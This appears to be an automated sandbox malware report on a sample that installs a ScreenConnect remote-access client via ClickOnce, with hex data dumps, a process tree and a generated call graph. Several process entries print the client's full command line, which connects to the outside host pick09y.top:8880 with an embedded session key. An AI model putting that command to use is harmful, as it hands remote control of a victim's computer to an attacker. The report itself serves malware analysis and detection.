                                                                                                                                                                                                2024-11-07 16:56:27 UTC1369INData Raw: 12 00 fe 15 8e 00 00 1b 02 6f c8 00 00 0a 0b 2b 12 07 6f c9 00 00 0a 0c 03 08 6f ca 00 00 0a 2c 02 08 0a 07 6f 11 00 00 0a 2d e6 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 0f 00 1e 2d 00 0a 00 00 00 00 1b 30 02 00 50 00 00 00 22 00 00 11 02 75 b3 00 00 1b 0b 07 2d 0c 02 75 27 00 00 01 0c 08 2d 09 2b 0e 07 6f c6 00 00 0a 2a 08 6f 04 01 00 0a 2a 16 0a 02 6f c8 00 00 0a 0d 2b 0b 09 6f c9 00 00 0a 26 06 17 58 0a 09 6f 11 00 00 0a 2d ed de 0a 09 2c 06 09 6f 10 00 00 0a dc 06 2a 01 10 00 00 02 00 2d 00 17 44 00 0a 00 00 00 00 1b 30 02 00 35 00 00 00 17 00 00 11 16 0a 02 6f c8 00 00 0a 0b 2b 14 07 6f c9 00 00 0a 0c 03 08 6f ca 00 00 0a 2c 04 06 17 58 0a 07 6f 11 00 00 0a 2d e4 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 2a 00 00 00 01 10 00
                                                                                                                                                                                                Data Ascii: o+oo,o-,o*-0P"u-u'-+o*o*o+o&Xo-,o*-D05o+oo,Xo-,o*
                                                                                                                                                                                                2024-11-07 16:56:27 UTC1369INData Raw: 1f 7d 6f 23 01 00 0a 26 06 6f 43 00 00 0a 2a d2 03 72 d0 03 00 70 6f 22 01 00 0a 26 03 02 28 31 01 00 06 6f 24 01 00 0a 26 03 72 06 04 00 70 6f 22 01 00 0a 26 03 02 28 33 01 00 06 6f 24 01 00 0a 26 17 2a 2e 02 03 28 39 01 00 06 16 fe 01 2a 26 0f 00 03 28 3c 01 00 06 2a a2 28 25 01 00 0a 02 7b 34 00 00 04 6f 26 01 00 0a 20 29 55 55 a5 5a 28 27 01 00 0a 02 7b 35 00 00 04 6f 28 01 00 0a 58 2a 5e 03 75 39 00 00 02 2c 0d 02 03 a5 39 00 00 02 28 3c 01 00 06 2a 16 2a c6 28 25 01 00 0a 02 7b 34 00 00 04 03 7b 34 00 00 04 6f 29 01 00 0a 2c 17 28 27 01 00 0a 02 7b 35 00 00 04 03 7b 35 00 00 04 6f 2a 01 00 0a 2a 16 2a 76 02 73 3c 00 00 0a 7d 36 00 00 04 02 28 3c 00 00 0a 02 28 10 00 00 2b 7d 39 00 00 04 2a aa 02 73 3c 00 00 0a 7d 36 00 00 04 02 28 3c 00 00 0a 02 03
                                                                                                                                                                                                Data Ascii: }o#&oC*rpo"&(1o$&rpo"&(3o$&*.(9*&(<*(%{4o& )UUZ('{5o(X*^u9,9(<**(%{4{4o),('{5{5o***vs<}6(<(+}9*s<}6(<
                                                                                                                                                                                                2024-11-07 16:56:28 UTC1369INData Raw: 16 28 1c 00 00 2b 28 1d 00 00 2b 28 1e 00 00 2b 28 1f 00 00 2b 2a 5a 7e 45 00 00 04 02 28 20 00 00 2b 28 21 00 00 2b 80 45 00 00 04 2a ae 73 8a 0d 00 06 25 02 7d 1a 05 00 04 25 03 7d 1b 05 00 04 25 04 7d 1c 05 00 04 fe 06 8b 0d 00 06 73 45 01 00 0a 28 63 01 00 06 2a 76 73 8c 0d 00 06 25 02 7d 1d 05 00 04 fe 06 8d 0d 00 06 73 45 01 00 0a 28 63 01 00 06 2a ae 73 8e 0d 00 06 25 02 7d 1e 05 00 04 25 03 7d 1f 05 00 04 25 04 7d 20 05 00 04 fe 06 8f 0d 00 06 73 45 01 00 0a 28 63 01 00 06 2a 5a 1f fe 73 90 0d 00 06 25 02 7d 25 05 00 04 25 03 7d 27 05 00 04 2a 13 30 03 00 2f 00 00 00 2d 00 00 11 73 86 0d 00 06 0a 06 02 7d 18 05 00 04 06 7b 18 05 00 04 6f 46 01 00 0a 28 c2 09 00 06 06 fe 06 87 0d 00 06 73 47 01 00 0a 28 22 00 00 2b 2a 00 13 30 03 00 45 00 00 00 2e
                                                                                                                                                                                                Data Ascii: (+(+(+(+*Z~E( +(!+E*s%}%}%}sE(c*vs%}sE(c*s%}%}%} sE(c*Zs%}%%}'*0/-s}{oF(sG("+*0E.


                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:11:55:49
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\pzPO97QouM.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\pzPO97QouM.exe"
                                                                                                                                                                                                Imagebase:0x9c0000
                                                                                                                                                                                                File size:83'336 bytes
                                                                                                                                                                                                MD5 hash:47891CF8A43A19E066FE70E812982C98
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                Start time:11:55:49
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                Imagebase:0x1674c320000
                                                                                                                                                                                                File size:24'856 bytes
                                                                                                                                                                                                MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2234906229.000001674E2A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                Start time:11:55:49
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                Imagebase:0x7ff77afe0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:11:55:50
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440
                                                                                                                                                                                                Imagebase:0x4f0000
                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:11:55:50
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 756
                                                                                                                                                                                                Imagebase:0x4f0000
                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:11:55:50
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                Imagebase:0x7ff77afe0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:11:55:52
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                Imagebase:0x7ff77afe0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                Start time:11:56:31
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1768380030.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:11:56:31
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                Imagebase:0x440000
                                                                                                                                                                                                File size:95'520 bytes
                                                                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:11:56:32
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                Imagebase:0x440000
                                                                                                                                                                                                File size:95'520 bytes
                                                                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:11:56:33
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "52c6258f-85a1-42d1-9479-cad4b97013ae" "User"
                                                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:2.2%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:3.8%
                                                                                                                                                                                                  Total number of Nodes:1464
                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                  execution_graph 6126 9c7d1c 6127 9c522b 46 API calls 6126->6127 6128 9c7d21 6127->6128 6590 9c365d 6591 9c3e89 33 API calls 6590->6591 6592 9c3665 6591->6592 6129 9c7419 6139 9c7fb2 6129->6139 6133 9c7426 6152 9c828e 6133->6152 6136 9c7450 6137 9c4869 _free 15 API calls 6136->6137 6138 9c745b 6137->6138 6156 9c7fbb 6139->6156 6141 9c7421 6142 9c81ee 6141->6142 6143 9c81fa ___scrt_is_nonwritable_in_current_image 6142->6143 6176 9c56e2 EnterCriticalSection 6143->6176 6145 9c8270 6190 9c8285 6145->6190 6147 9c8244 DeleteCriticalSection 6150 9c4869 _free 15 API calls 6147->6150 6148 9c827c _abort 6148->6133 6151 9c8205 6150->6151 6151->6145 6151->6147 6177 9c901c 6151->6177 6153 9c7435 DeleteCriticalSection 6152->6153 6154 9c82a4 6152->6154 6153->6133 6153->6136 6154->6153 6155 9c4869 _free 15 API calls 6154->6155 6155->6153 6157 9c7fc7 ___scrt_is_nonwritable_in_current_image 6156->6157 6166 9c56e2 EnterCriticalSection 6157->6166 6159 9c806a 6171 9c808a 6159->6171 6162 9c7fd6 6162->6159 6165 9c7f6b 61 API calls 6162->6165 6167 9c7465 EnterCriticalSection 6162->6167 6168 9c8060 6162->6168 6163 9c8076 _abort 6163->6141 6165->6162 6166->6162 6167->6162 6174 9c7479 LeaveCriticalSection 6168->6174 6170 9c8068 6170->6162 6175 9c572a LeaveCriticalSection 6171->6175 6173 9c8091 6173->6163 6174->6170 6175->6173 6176->6151 6178 9c9028 ___scrt_is_nonwritable_in_current_image 6177->6178 6179 9c904e 6178->6179 6180 9c9039 6178->6180 6189 9c9049 _abort 6179->6189 6193 9c7465 EnterCriticalSection 6179->6193 6181 9c47f9 __dosmaperr 15 API calls 6180->6181 6182 9c903e 6181->6182 6185 9c473d _abort 21 API calls 6182->6185 6184 9c906a 6194 9c8fa6 6184->6194 6185->6189 6187 9c9075 6210 9c9092 6187->6210 6189->6151 6448 9c572a LeaveCriticalSection 6190->6448 6192 9c828c 6192->6148 6193->6184 6195 9c8fc8 6194->6195 6196 9c8fb3 6194->6196 6200 9c8fc3 6195->6200 6213 9c7f05 6195->6213 6197 9c47f9 __dosmaperr 15 API calls 6196->6197 6199 9c8fb8 6197->6199 6202 9c473d _abort 21 API calls 6199->6202 6200->6187 6202->6200 6203 9c828e 15 API calls 6204 9c8fe4 6203->6204 6219 9c732b 6204->6219 6206 9c8fea 6226 9c9d4e 6206->6226 6209 9c4869 _free 15 API calls 6209->6200 6447 9c7479 LeaveCriticalSection 6210->6447 6212 9c909a 6212->6189 6214 9c7f1d 6213->6214 6218 9c7f19 6213->6218 6215 9c732b 21 API calls 6214->6215 6214->6218 6216 9c7f3d 6215->6216 6241 9c89a7 6216->6241 6218->6203 6220 9c734c 6219->6220 6221 9c7337 6219->6221 6220->6206 6222 9c47f9 __dosmaperr 15 API calls 6221->6222 6223 9c733c 6222->6223 6224 9c473d _abort 21 API calls 6223->6224 6225 9c7347 6224->6225 6225->6206 6227 9c9d5d 6226->6227 6228 9c9d72 6226->6228 6229 9c47e6 __dosmaperr 15 API calls 6227->6229 6230 9c9dad 6228->6230 6234 9c9d99 6228->6234 6231 9c9d62 6229->6231 6232 9c47e6 __dosmaperr 15 API calls 6230->6232 6233 9c47f9 __dosmaperr 15 API calls 6231->6233 6235 9c9db2 6232->6235 6239 9c8ff0 6233->6239 6404 9c9d26 6234->6404 6236 9c47f9 __dosmaperr 15 API calls 6235->6236 6238 9c9dba 6236->6238 6240 9c473d _abort 21 API calls 6238->6240 6239->6200 6239->6209 6240->6239 6242 9c89b3 ___scrt_is_nonwritable_in_current_image 6241->6242 6243 9c89bb 6242->6243 6244 9c89d3 6242->6244 6266 9c47e6 6243->6266 6246 9c8a71 6244->6246 6250 9c8a08 6244->6250 6248 9c47e6 __dosmaperr 15 API calls 6246->6248 6251 9c8a76 6248->6251 6249 9c47f9 __dosmaperr 15 API calls 6254 9c89c8 _abort 6249->6254 6269 9c5d23 EnterCriticalSection 6250->6269 6253 9c47f9 __dosmaperr 15 API calls 6251->6253 6256 9c8a7e 6253->6256 6254->6218 6255 9c8a0e 6257 9c8a3f 6255->6257 6258 9c8a2a 6255->6258 6259 9c473d _abort 21 API calls 6256->6259 6270 9c8a92 6257->6270 6260 9c47f9 __dosmaperr 15 API calls 6258->6260 6259->6254 6262 9c8a2f 6260->6262 6264 9c47e6 __dosmaperr 15 API calls 6262->6264 6263 9c8a3a 6319 9c8a69 6263->6319 6264->6263 6267 9c44a8 __dosmaperr 15 API calls 6266->6267 6268 9c47eb 6267->6268 6268->6249 6269->6255 6271 9c8ac0 6270->6271 6277 9c8ab9 _ValidateLocalCookies 6270->6277 6272 9c8ac4 6271->6272 6273 9c8ae3 6271->6273 6274 9c47e6 __dosmaperr 15 API calls 6272->6274 6275 9c8b34 6273->6275 6276 9c8b17 6273->6276 6278 9c8ac9 6274->6278 6280 9c8b4a 6275->6280 6322 9c8f8b 6275->6322 6279 9c47e6 __dosmaperr 15 API calls 6276->6279 6277->6263 6281 9c47f9 __dosmaperr 15 API calls 6278->6281 6283 9c8b1c 6279->6283 6325 9c8637 6280->6325 6285 9c8ad0 6281->6285 6287 9c47f9 __dosmaperr 15 API calls 6283->6287 6288 9c473d _abort 21 API calls 6285->6288 6291 9c8b24 6287->6291 6288->6277 6289 9c8b58 6292 9c8b5c 6289->6292 6293 9c8b7e 6289->6293 6290 9c8b91 6295 9c8beb WriteFile 6290->6295 6296 9c8ba5 6290->6296 6294 9c473d _abort 21 API calls 6291->6294 6311 9c8c52 6292->6311 6332 9c85ca 6292->6332 6337 9c8417 GetConsoleCP 6293->6337 6294->6277 6298 9c8c0e GetLastError 6295->6298 6306 9c8b74 6295->6306 6299 9c8bad 6296->6299 6300 9c8bdb 6296->6300 6298->6306 6303 9c8bcb 6299->6303 6304 9c8bb2 6299->6304 6357 9c86ad 6300->6357 6351 9c887a 6303->6351 6304->6311 6346 9c878c 6304->6346 6306->6277 6310 9c8c2e 6306->6310 6306->6311 6307 9c47f9 __dosmaperr 15 API calls 6309 9c8c77 6307->6309 6312 9c47e6 __dosmaperr 15 API calls 6309->6312 6313 9c8c49 6310->6313 6314 9c8c35 6310->6314 6311->6277 6311->6307 6312->6277 6362 9c47c3 6313->6362 6315 9c47f9 __dosmaperr 15 API calls 6314->6315 6317 9c8c3a 6315->6317 6318 9c47e6 __dosmaperr 15 API calls 6317->6318 6318->6277 6403 9c5d46 LeaveCriticalSection 6319->6403 6321 9c8a6f 6321->6254 6367 9c8f0d 6322->6367 6389 9c7eaf 6325->6389 6327 9c8647 6328 9c864c 6327->6328 6329 9c4424 _abort 33 API calls 6327->6329 6328->6289 6328->6290 6330 9c866f 6329->6330 6330->6328 6331 9c868d GetConsoleMode 6330->6331 6331->6328 6333 9c85ef 6332->6333 6336 9c8624 6332->6336 6334 9c9101 WriteConsoleW CreateFileW 6333->6334 6335 9c8626 GetLastError 6333->6335 6333->6336 6334->6333 6335->6336 6336->6306 6338 9c858c _ValidateLocalCookies 6337->6338 6340 9c847a 6337->6340 6338->6306 6340->6338 6341 9c8500 WideCharToMultiByte 6340->6341 6343 9c72b7 35 API calls __fassign 6340->6343 6345 9c8557 WriteFile 6340->6345 6398 9c6052 6340->6398 6341->6338 6342 9c8526 WriteFile 6341->6342 6342->6340 6344 9c85af GetLastError 6342->6344 6343->6340 6344->6338 6345->6340 6345->6344 6347 9c879b 6346->6347 6348 9c8819 WriteFile 6347->6348 6349 9c885d _ValidateLocalCookies 6347->6349 6348->6347 6350 9c885f GetLastError 6348->6350 6349->6306 6350->6349 6356 9c8889 6351->6356 6352 9c8994 _ValidateLocalCookies 6352->6306 6353 9c890b WideCharToMultiByte 6354 9c898c GetLastError 6353->6354 6355 9c8940 WriteFile 6353->6355 6354->6352 6355->6354 6355->6356 6356->6352 6356->6353 6356->6355 6360 9c86bc 6357->6360 6358 9c872e WriteFile 6358->6360 6361 9c8771 GetLastError 6358->6361 6359 9c876f _ValidateLocalCookies 6359->6306 6360->6358 6360->6359 6361->6359 6363 9c47e6 __dosmaperr 15 API calls 6362->6363 6364 9c47ce __dosmaperr 6363->6364 6365 9c47f9 __dosmaperr 15 API calls 6364->6365 6366 9c47e1 6365->6366 6366->6277 6376 9c5dfa 6367->6376 6369 9c8f1f 6370 9c8f38 SetFilePointerEx 6369->6370 6371 9c8f27 6369->6371 6373 9c8f50 GetLastError 6370->6373 6375 9c8f2c 6370->6375 6372 9c47f9 __dosmaperr 15 API calls 6371->6372 6372->6375 6374 9c47c3 __dosmaperr 15 API calls 6373->6374 6374->6375 6375->6280 6377 9c5e07 6376->6377 6378 9c5e1c 6376->6378 6379 9c47e6 __dosmaperr 15 API calls 6377->6379 6380 9c47e6 __dosmaperr 15 API calls 6378->6380 6382 9c5e41 6378->6382 6381 9c5e0c 6379->6381 6383 9c5e4c 6380->6383 6384 9c47f9 __dosmaperr 15 API calls 6381->6384 6382->6369 6385 9c47f9 __dosmaperr 15 API calls 6383->6385 6386 9c5e14 6384->6386 6387 9c5e54 6385->6387 6386->6369 6388 9c473d _abort 21 API calls 6387->6388 6388->6386 6390 9c7ebc 6389->6390 6392 9c7ec9 6389->6392 6391 9c47f9 __dosmaperr 15 API calls 6390->6391 6395 9c7ec1 6391->6395 6393 9c7ed5 6392->6393 6394 9c47f9 __dosmaperr 15 API calls 6392->6394 6393->6327 6396 9c7ef6 6394->6396 6395->6327 6397 9c473d _abort 21 API calls 6396->6397 6397->6395 6399 9c4424 _abort 33 API calls 6398->6399 6400 9c605d 6399->6400 6401 9c72d1 __fassign 33 API calls 6400->6401 6402 9c606d 6401->6402 6402->6340 6403->6321 6407 9c9ca4 6404->6407 6406 9c9d4a 6406->6239 6408 9c9cb0 ___scrt_is_nonwritable_in_current_image 6407->6408 6418 9c5d23 EnterCriticalSection 6408->6418 6410 9c9cbe 6411 9c9ce5 6410->6411 6412 9c9cf0 6410->6412 6419 9c9dcd 6411->6419 6414 9c47f9 __dosmaperr 15 API calls 6412->6414 6415 9c9ceb 6414->6415 6434 9c9d1a 6415->6434 6417 9c9d0d _abort 6417->6406 6418->6410 6420 9c5dfa 21 API calls 6419->6420 6422 9c9ddd 6420->6422 6421 9c9de3 6437 9c5d69 6421->6437 6422->6421 6424 9c9e15 6422->6424 6425 9c5dfa 21 API calls 6422->6425 6424->6421 6426 9c5dfa 21 API calls 6424->6426 6428 9c9e0c 6425->6428 6429 9c9e21 CloseHandle 6426->6429 6431 9c5dfa 21 API calls 6428->6431 6429->6421 6432 9c9e2d GetLastError 6429->6432 6430 9c9e5d 6430->6415 6431->6424 6432->6421 6433 9c47c3 __dosmaperr 15 API calls 6433->6430 6446 9c5d46 LeaveCriticalSection 6434->6446 6436 9c9d24 6436->6417 6438 9c5ddf 6437->6438 6439 9c5d78 6437->6439 6440 9c47f9 __dosmaperr 15 API calls 6438->6440 6439->6438 6444 9c5da2 6439->6444 6441 9c5de4 6440->6441 6442 9c47e6 __dosmaperr 15 API calls 6441->6442 6443 9c5dcf 6442->6443 6443->6430 6443->6433 6444->6443 6445 9c5dc9 SetStdHandle 6444->6445 6445->6443 6446->6436 6447->6212 6448->6192 5947 9c5fd0 5948 9c5fdc ___scrt_is_nonwritable_in_current_image 5947->5948 5959 9c56e2 EnterCriticalSection 5948->5959 5950 9c5fe3 5960 9c5c8b 5950->5960 5952 9c5ff2 5957 9c6001 5952->5957 5973 9c5e64 GetStartupInfoW 5952->5973 5984 9c601d 5957->5984 5958 9c6012 _abort 5959->5950 5961 9c5c97 ___scrt_is_nonwritable_in_current_image 5960->5961 5962 9c5cbb 5961->5962 5963 9c5ca4 5961->5963 5987 9c56e2 EnterCriticalSection 5962->5987 5964 9c47f9 __dosmaperr 15 API calls 5963->5964 5966 9c5ca9 5964->5966 5967 9c473d _abort 21 API calls 5966->5967 5968 9c5cb3 _abort 5967->5968 5968->5952 5969 9c5cf3 5995 9c5d1a 5969->5995 5971 9c5cc7 5971->5969 5988 9c5bdc 5971->5988 5974 9c5f13 5973->5974 5975 9c5e81 5973->5975 5979 9c5f1a 5974->5979 5975->5974 5976 9c5c8b 22 API calls 5975->5976 5977 9c5eaa 5976->5977 5977->5974 5978 9c5ed8 GetFileType 5977->5978 5978->5977 5982 9c5f21 5979->5982 5980 9c5f64 GetStdHandle 5980->5982 5981 9c5fcc 5981->5957 5982->5980 5982->5981 5983 9c5f77 GetFileType 5982->5983 5983->5982 5999 9c572a LeaveCriticalSection 5984->5999 5986 9c6024 5986->5958 5987->5971 5989 9c480c _abort 15 API calls 5988->5989 5992 9c5bee 5989->5992 5990 9c5bfb 5991 9c4869 _free 15 API calls 5990->5991 5994 9c5c4d 5991->5994 5992->5990 5993 9c59b3 6 API calls 5992->5993 5993->5992 5994->5971 5998 9c572a LeaveCriticalSection 5995->5998 5997 9c5d21 5997->5968 